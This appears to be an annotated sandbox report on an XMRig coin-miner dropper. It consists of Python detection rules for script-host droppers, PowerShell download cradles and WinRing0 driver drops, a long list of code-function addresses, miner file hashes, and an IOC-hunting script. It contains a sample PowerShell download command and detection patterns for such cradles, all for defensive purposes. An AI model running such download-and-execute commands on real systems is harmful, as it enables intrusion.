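          target="C:\\ProgramData\\Drivers\\WinRing0x64.sys"),
    Event("process", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
          parent="C:\\Windows\\explorer.exe",
          cmdline="powershell -c \"Invoke-WebRequest -Uri 'https://example.org/tool.zip' "
                  "-OutFile 'C:\\Users\\user\\Downloads\\tool.zip'\""),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
USER_WRITABLE = ("\\appdata\\roaming\\", "\\appdata\\local\\temp\\", "\\programdata\\")
DYNDNS = ("duckdns.org", "no-ip.org", "ddns.net", "hopto.org")
DEFAULT_PORTS = {"http": 80, "https": 443}
OUTFILE_RE = re.compile(r"-OutFile\s+'([^']+)'", re.I)
URI_RE = re.compile(r"-Uri\s+'(https?)://([^/':]+)(?::(\d+))?", re.I)


def base(path):
    return path.rsplit("\\", 1)[-1].lower()


def rule_script_host_dropper(ev):
    """wscript/cscript spawning cmd.exe to run a .bat from a user-writable directory."""
    if ev.kind != "process" or base(ev.parent) not in SCRIPT_HOSTS or base(ev.image) != "cmd.exe":
        return None
    cl = ev.cmdline.lower()
    if ".bat" in cl and any(d in cl for d in USER_WRITABLE):
        return "script host runs .bat from user-writable path"
    return None


def rule_download_and_execute(ev):
    """PowerShell download cradle; fires only when at least two suspicious traits coincide."""
    if ev.kind != "process" or base(ev.image) not in {"powershell.exe", "pwsh.exe"}:
        return None
    cl = ev.cmdline
    if not re.search(r"\b(Invoke-WebRequest|iwr|Start-BitsTransfer)\b", cl, re.I):
        return None
    out = OUTFILE_RE.search(cl)
    if not out:
        return None
    path = out.group(1)
    reasons = []
    if any(d in path.lower() for d in USER_WRITABLE):
        reasons.append("download into user-writable path")
    if cl.find(path, out.end()) != -1:      # the dropped path is invoked later in the same line
        reasons.append("downloaded file executed in same command")
    uri = URI_RE.search(cl)
    if uri:
        scheme, host, port = uri.groups()
        if port and int(port) != DEFAULT_PORTS[scheme.lower()]:
            reasons.append(f"non-standard port {port}")
        if any(host.lower().endswith(d) for d in DYNDNS):
            reasons.append("dynamic-DNS host")
    return "; ".join(reasons) if len(reasons) >= 2 else None


def rule_driver_drop(ev):
    """A .sys written outside System32\\drivers by a process that is not itself under C:\\Windows."""
    if ev.kind != "file" or not ev.target.lower().endswith(".sys"):
        return None
    if ev.target.lower().startswith("c:\\windows\\system32\\drivers\\") or ev.image.lower().startswith("c:\\windows\\"):
        return None
    note = "driver written outside System32\\drivers by non-system process"
    if base(ev.target).startswith("winring0"):
        note += "; WinRing0 is the driver XMRig bundles for MSR access"
    return note


RULES = {
    "script_host_dropper": rule_script_host_dropper,
    "download_and_execute": rule_download_and_execute,
    "driver_drop": rule_driver_drop,
}


def run_rules(events):
    hits = []
    for ev in events:
        for name, rule in RULES.items():
            note = rule(ev)
            if note:
                hits.append({"rule": name, "image": ev.image, "note": note})
    return hits


if __name__ == "__main__":
    for h in run_rules(EVENTS):
        print(f"[{h['rule']}] {h['image']}: {h['note']}")
```

The download rule deliberately requires two traits so that an administrator pulling a file over HTTPS into Downloads (the control event) stays quiet, while the report's cradle trips all four; the driver rule exempts writes by processes under C:\Windows only to keep the example short, and a production version should key on the driver's hash or signer rather than its path.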
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332C03B4 0_2_00007FF7332C03B4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332AA1CC 0_2_00007FF7332AA1CC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF73329F8F0 0_2_00007FF73329F8F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332B1B80 0_2_00007FF7332B1B80
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332BCAE8 0_2_00007FF7332BCAE8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332B30E4 0_2_00007FF7332B30E4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF733295E30 0_2_00007FF733295E30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332BADF0 0_2_00007FF7332BADF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332CC498 0_2_00007FF7332CC498
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332AB250 0_2_00007FF7332AB250
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF733297288 0_2_00007FF733297288
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF73329C308 0_2_00007FF73329C308
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF73329A304 0_2_00007FF73329A304
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332A11D4 0_2_00007FF7332A11D4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332D21B0 0_2_00007FF7332D21B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF733294840 0_2_00007FF733294840
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332C887C 0_2_00007FF7332C887C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332A58D4 0_2_00007FF7332A58D4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332AB8AC 0_2_00007FF7332AB8AC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332D5758 0_2_00007FF7332D5758
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332B47F8 0_2_00007FF7332B47F8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332AC688 0_2_00007FF7332AC688
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF73329A66C 0_2_00007FF73329A66C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332976C0 0_2_00007FF7332976C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332B2710 0_2_00007FF7332B2710
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332CF6F4 0_2_00007FF7332CF6F4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332B35C4 0_2_00007FF7332B35C4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332C8600 0_2_00007FF7332C8600
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332AAC34 0_2_00007FF7332AAC34
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332D1CE0 0_2_00007FF7332D1CE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332C03B4 0_2_00007FF7332C03B4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332B8A54 0_2_00007FF7332B8A54
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332A1A5C 0_2_00007FF7332A1A5C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF733291AA4 0_2_00007FF733291AA4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332B29B8 0_2_00007FF7332B29B8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332B5050 0_2_00007FF7332B5050
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332B1E30 0_2_00007FF7332B1E30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332AEE74 0_2_00007FF7332AEE74
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C570F8F0 6_2_00007FF6C570F8F0
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C571A1CC 6_2_00007FF6C571A1CC
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C57303B4 6_2_00007FF6C57303B4
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C572ADF0 6_2_00007FF6C572ADF0
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C5705E30 6_2_00007FF6C5705E30
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C57230E4 6_2_00007FF6C57230E4
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C572CAE8 6_2_00007FF6C572CAE8
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C5721B80 6_2_00007FF6C5721B80
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C573F6F4 6_2_00007FF6C573F6F4
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C5722710 6_2_00007FF6C5722710
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C570A66C 6_2_00007FF6C570A66C
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C571C688 6_2_00007FF6C571C688
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C57076C0 6_2_00007FF6C57076C0
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C57235C4 6_2_00007FF6C57235C4
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C5738600 6_2_00007FF6C5738600
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C57158D4 6_2_00007FF6C57158D4
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C5704840 6_2_00007FF6C5704840
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C573887C 6_2_00007FF6C573887C
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C571B8AC 6_2_00007FF6C571B8AC
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C57247F8 6_2_00007FF6C57247F8
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C5745758 6_2_00007FF6C5745758
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C5707288 6_2_00007FF6C5707288
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C570A304 6_2_00007FF6C570A304
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C570C308 6_2_00007FF6C570C308
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C571B250 6_2_00007FF6C571B250
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C57111D4 6_2_00007FF6C57111D4
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C57421B0 6_2_00007FF6C57421B0
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C573C498 6_2_00007FF6C573C498
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C571EE74 6_2_00007FF6C571EE74
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C5721E30 6_2_00007FF6C5721E30
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C5725050 6_2_00007FF6C5725050
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C5701AA4 6_2_00007FF6C5701AA4
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C5728A54 6_2_00007FF6C5728A54
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C57303B4 6_2_00007FF6C57303B4
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C5711A5C 6_2_00007FF6C5711A5C
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C57229B8 6_2_00007FF6C57229B8
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C5741CE0 6_2_00007FF6C5741CE0
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C571AC34 6_2_00007FF6C571AC34
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033928A8 27_2_00007FF7033928A8
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033D6BEC 27_2_00007FF7033D6BEC
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF703395AE8 27_2_00007FF703395AE8
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033D796C 27_2_00007FF7033D796C
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033A5F20 27_2_00007FF7033A5F20
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033A9EAC 27_2_00007FF7033A9EAC
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033A1494 27_2_00007FF7033A1494
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033F043C 27_2_00007FF7033F043C
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033FA4AC 27_2_00007FF7033FA4AC
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033C0358 27_2_00007FF7033C0358
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033C43D8 27_2_00007FF7033C43D8
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033A03A4 27_2_00007FF7033A03A4
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033E0280 27_2_00007FF7033E0280
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033C32E0 27_2_00007FF7033C32E0
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033CD174 27_2_00007FF7033CD174
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033EC85C 27_2_00007FF7033EC85C
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033F3878 27_2_00007FF7033F3878
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033D2890 27_2_00007FF7033D2890
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF70338A8F8 27_2_00007FF70338A8F8
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033B38BC 27_2_00007FF7033B38BC
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033E88CC 27_2_00007FF7033E88CC
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033C4658 27_2_00007FF7033C4658
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033B366C 27_2_00007FF7033B366C
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF70339F694 27_2_00007FF70339F694
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033DD644 27_2_00007FF7033DD644
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033C3698 27_2_00007FF7033C3698
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF703397594 27_2_00007FF703397594
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033E0C80 27_2_00007FF7033E0C80
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033C5C48 27_2_00007FF7033C5C48
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033FBC4A 27_2_00007FF7033FBC4A
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033D9D0C 27_2_00007FF7033D9D0C
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033AAB5C 27_2_00007FF7033AAB5C
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033ACB9C 27_2_00007FF7033ACB9C
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033C3BB0 27_2_00007FF7033C3BB0
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033B1BC4 27_2_00007FF7033B1BC4
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033F8BB8 27_2_00007FF7033F8BB8
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033EEA70 27_2_00007FF7033EEA70
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF70338BAD8 27_2_00007FF70338BAD8
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF703383AD0 27_2_00007FF703383AD0
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033DF0EC 27_2_00007FF7033DF0EC
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033E50C4 27_2_00007FF7033E50C4
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033C6F74 27_2_00007FF7033C6F74
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033C3F96 27_2_00007FF7033C3F96
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033CEF34 27_2_00007FF7033CEF34
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF703392E60 27_2_00007FF703392E60
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033B5EF0 27_2_00007FF7033B5EF0
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033C0EAC 27_2_00007FF7033C0EAC
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033C3D80 27_2_00007FF7033C3D80
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033E1D78 27_2_00007FF7033E1D78
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033ABD24 27_2_00007FF7033ABD24
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033B3E00 27_2_00007FF7033B3E00
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2CADF0 31_2_00007FF75C2CADF0
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2A5E30 31_2_00007FF75C2A5E30
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2CCAE8 31_2_00007FF75C2CCAE8
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2AF8F0 31_2_00007FF75C2AF8F0
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2BA1CC 31_2_00007FF75C2BA1CC
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2D03B4 31_2_00007FF75C2D03B4
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2C1E30 31_2_00007FF75C2C1E30
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2BEE74 31_2_00007FF75C2BEE74
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2C5050 31_2_00007FF75C2C5050
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2C30E4 31_2_00007FF75C2C30E4
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2C29B8 31_2_00007FF75C2C29B8
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2C8A54 31_2_00007FF75C2C8A54
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2B1A5C 31_2_00007FF75C2B1A5C
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2A1AA4 31_2_00007FF75C2A1AA4
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2C1B80 31_2_00007FF75C2C1B80
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2BAC34 31_2_00007FF75C2BAC34
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2E1CE0 31_2_00007FF75C2E1CE0
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2C35C4 31_2_00007FF75C2C35C4
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2D8600 31_2_00007FF75C2D8600
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2BC688 31_2_00007FF75C2BC688
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2AA66C 31_2_00007FF75C2AA66C
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2A76C0 31_2_00007FF75C2A76C0
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2C2710 31_2_00007FF75C2C2710
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2DF6F4 31_2_00007FF75C2DF6F4
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2E5758 31_2_00007FF75C2E5758
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2C47F8 31_2_00007FF75C2C47F8
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2A4840 31_2_00007FF75C2A4840
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2D887C 31_2_00007FF75C2D887C
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2B58D4 31_2_00007FF75C2B58D4
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2BB8AC 31_2_00007FF75C2BB8AC
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2B11D4 31_2_00007FF75C2B11D4
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2E21B0 31_2_00007FF75C2E21B0
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2BB250 31_2_00007FF75C2BB250
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2A7288 31_2_00007FF75C2A7288
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2AC308 31_2_00007FF75C2AC308
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2AA304 31_2_00007FF75C2AA304
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2DC498 31_2_00007FF75C2DC498
Source: Joe Sandbox View Dropped File: C:\ProgramData\Drivers\WinRing0x64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
Source: Joe Sandbox View Dropped File: C:\ProgramData\Drivers\xmrig.exe 0510F1E57B0BC5967A8B658CEA729948219D578B6C9B3A036FF33B4A6A46E495
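The two dropped-file lines above carry the on-disk paths and SHA256 hashes of the miner components (the WinRing0 driver and the xmrig binary), which are the most directly usable indicators on this page. The Python below is an added example, not part of the report or of Joe Sandbox: it parses lines in the report's own "Dropped File" and "Section loaded" format into indicators, hunts a directory tree for files whose SHA256 matches a dropped-file hash, and flags two module-load pairings that corroborate the Sigma hits in the overview (the script host loading scrrun.dll, the Scripting Runtime behind FileSystemObject, and PowerShell loading winhttp.dll, consistent with outbound web requests). SAMPLE_LINES is constructed from lines of this report; the planted file and the `C:\constructed\planted.exe` indicator inside demo() are assumptions that make the run self-contained and are not from the analysis.

```python
import hashlib
import ntpath
import os
import re
import tempfile

# Constructed sample: behaviour lines copied in the report's own format.
SAMPLE_LINES = [
    "Source: Joe Sandbox View Dropped File: C:\\ProgramData\\Drivers\\WinRing0x64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5",
    "Source: Joe Sandbox View Dropped File: C:\\ProgramData\\Drivers\\xmrig.exe 0510F1E57B0BC5967A8B658CEA729948219D578B6C9B3A036FF33B4A6A46E495",
    "Source: C:\\Windows\\System32\\wscript.exe Section loaded: vbscript.dll Jump to behavior",
    "Source: C:\\Windows\\System32\\wscript.exe Section loaded: scrrun.dll Jump to behavior",
    "Source: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Section loaded: winhttp.dll",
]

DROPPED_RE = re.compile(r"Dropped File: (?P<path>.+?) (?P<sha256>[0-9A-Fa-f]{64})\s*$")
LOADED_RE = re.compile(r"^Source: (?P<image>.+?) Section loaded: (?P<module>\S+)")

# (image, module) pairs worth a second look; module loads alone are weak signals,
# they are used here to corroborate the report's process-level detections.
SUSPICIOUS_LOADS = {
    ("wscript.exe", "scrrun.dll"): "script host using the Scripting Runtime (FileSystemObject): file-drop capability",
    ("powershell.exe", "winhttp.dll"): "PowerShell loading WinHTTP: consistent with a web download",
}


def parse_report_lines(lines):
    """Split report lines into {dropped_path: sha256} and [(image_name, module)]."""
    dropped, loads = {}, []
    for line in lines:
        m = DROPPED_RE.search(line)
        if m:
            dropped[m.group("path")] = m.group("sha256").lower()
            continue
        m = LOADED_RE.match(line)
        if m:
            image = ntpath.basename(m.group("image")).lower()  # ntpath handles backslashes on any OS
            loads.append((image, m.group("module").lower()))
    return dropped, loads


def flag_loads(loads):
    """Return [(image, module, reason)] for loads that match SUSPICIOUS_LOADS."""
    return [(img, mod, SUSPICIOUS_LOADS[(img, mod)]) for img, mod in loads if (img, mod) in SUSPICIOUS_LOADS]


def sha256_file(path, chunk=1 << 20):
    """Stream a file through SHA256 so large binaries do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def hunt_hashes(root, iocs):
    """Walk root and return {found_path: ioc_path} for files whose SHA256 is a known dropped-file hash."""
    wanted = {digest: ioc_path for ioc_path, digest in iocs.items()}
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                digest = sha256_file(full)
            except OSError:  # unreadable or vanished file: skip, keep hunting
                continue
            if digest in wanted:
                hits[full] = wanted[digest]
    return hits


def demo():
    """Self-contained run: the report's IOCs plus one constructed file registered as a fake IOC."""
    dropped, loads = parse_report_lines(SAMPLE_LINES)
    with tempfile.TemporaryDirectory() as root:
        planted = os.path.join(root, "svc.bin")
        with open(planted, "wb") as f:
            f.write(b"constructed stand-in for a dropped payload\n")
        iocs = dict(dropped)
        iocs["C:\\constructed\\planted.exe"] = sha256_file(planted)  # assumption, not from the report
        hits = hunt_hashes(root, iocs)
    return dropped, flag_loads(loads), hits


if __name__ == "__main__":
    print(demo())
```

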